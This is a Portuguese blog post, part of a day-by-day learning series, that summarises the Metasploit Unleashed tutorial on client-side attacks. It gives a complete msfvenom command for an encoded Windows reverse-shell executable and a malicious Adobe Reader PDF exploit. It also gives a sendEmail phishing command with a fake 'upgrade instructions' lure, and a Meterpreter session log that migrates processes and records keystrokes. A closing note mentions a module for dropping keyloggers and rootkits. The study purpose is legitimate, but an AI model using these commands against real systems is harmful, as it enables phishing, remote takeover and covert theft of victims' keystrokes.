DIA#24-Ethical Hacking Tools (Metasploit- Client-Side Attacks)
Continuo hoje o tutorial da Offensive Security, desta vez focando nos Client-Side Attacks.
Os client-side precisam user-interaction como a vitima clicar em links, abrir um documento ou chegar de alguma maneira ao website malicioso. Existem várias maneiras de usar Metasploit para realizar client-side attacks, sendo algumas das maneiras demonstradas de seguida.
Uma das maneiras possíveis de fazer os client-side attacks é através do uso da ferramenta msfvenom, esta ferramenta pode ser usada para gerar payloads em diferentes sítios, com diferentes outputs. Um exemplo de uso é por exemplo com o comando "msfvenom --payload-options -p windows/shell/reverse_tcp" é possível observar as diferentes opções existentes para os payload escolhido, neste caso "reverse_tcp", tendo as opções em conta usa-se o comando "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe" para gerar o payload para um ficheiro executável, neste caso "1.exe", depois disto irá-se usar o módulo "multi/handler", que é usado para lidar com exploits iniciadas fora do Framework, para fazer uso deste módulo usa-se, neste caso, "set payload windows/shell/reverse_tcp" e depois faz-se a configuração do LHost e LPort pretendidos, depois de tudo isto falta apenas correr o exploit do "multi/handler" e executamos o ficheiro .exe criado anteriormente na vitima, o "multi/handler" irá tratar do exploit e apresentar a shell.
Outro exemplo que foi apresentado no tutorial foi o exploit para aproveitar a vulnerabilidade de stack-based buffer-overflow que existia no Adobe Reader devido à aplicação não fazer os boundary checks devidos à data enviada pelo user. Para fazer uso desse exploit usa-se o módulo "adobe_utilprintf" para criar o ficheiro PDF malicioso em que se coloca em payload um "reverse_tcp".
Depois da criação do ficheiro e antes de o enviar para a vitima é necessário fazer o setup de algo para "ouvir" o reverse_tcp, que irá ser o módulo "/multi/handler".
Neste momento passa-se para o envio do email (supondo que se tem o email da vitima), onde se usa o script "sendEmail", por exemplo, "sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf", em que as opções apresentadas representam: FROM (-f) address, TO (-t) address, SMTP (-s) server, titulo do mail(-u) e PDF malicioso(-a). Após clicar o enter do comando anterior pode-se escrever o mail e clica-se CTRL+D para enviar a mensagem.
Finalmente espera-se que a vitima tente abrir o ficheiro e fica-se com acesso à shell, a partir dai deve-se mudar a shell de processo para não a perder quando encerrarem o Adobe, esse processo encontra-se descrito na seguinte imagem parcialmente retirada de "https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/".
meterpreter > ps Process list ============ PID Name Path --- ---- ---- 852 taskeng.exe C:\Windows\system32\taskeng.exe 1308 Dwm.exe C:\Windows\system32\Dwm.exe 1520 explorer.exe C:\Windows\explorer.exe 2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe 3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe 3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter > sysinfo Computer: OFFSEC-PC OS : Windows Vista (Build 6000, ). meterpreter > use priv Loading extension priv...success. meterpreter > run post/windows/capture/keylog_recorder [*] Executing module against V-MAC-XP [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt [*] Recording keystrokes... root@kali:~# cat /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt Keystroke log started at Wed Mar 23 09:18:36 -0600 2011 ...
PS.
- De modo a mostrar que não existem Client-Side Attacks e Trojans apenas em windows, foi apresentado um exemplo de um Trojan para Linux, como se trata de coisas razoavelmente desactualizadas não coloquei no blog, caso tenha interesse recomendo ir a "https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/".
- Durante a análise do tópico de hoje encontrei uma pagina bastante útil, relativamente como e quando usar o reverse shell em "https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit".
- Durante a análise do tópico encontrei o módulo "windows/download_exec" utilizado para instalar o que se quiser na máquina do target, como por exemplo: keyloggers, rootkits, persistent shells, adware, etc.
- Para ver um exemplo de exploit usando documentos word e excel recomendo ir a "https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/"
Comentários
Enviar um comentário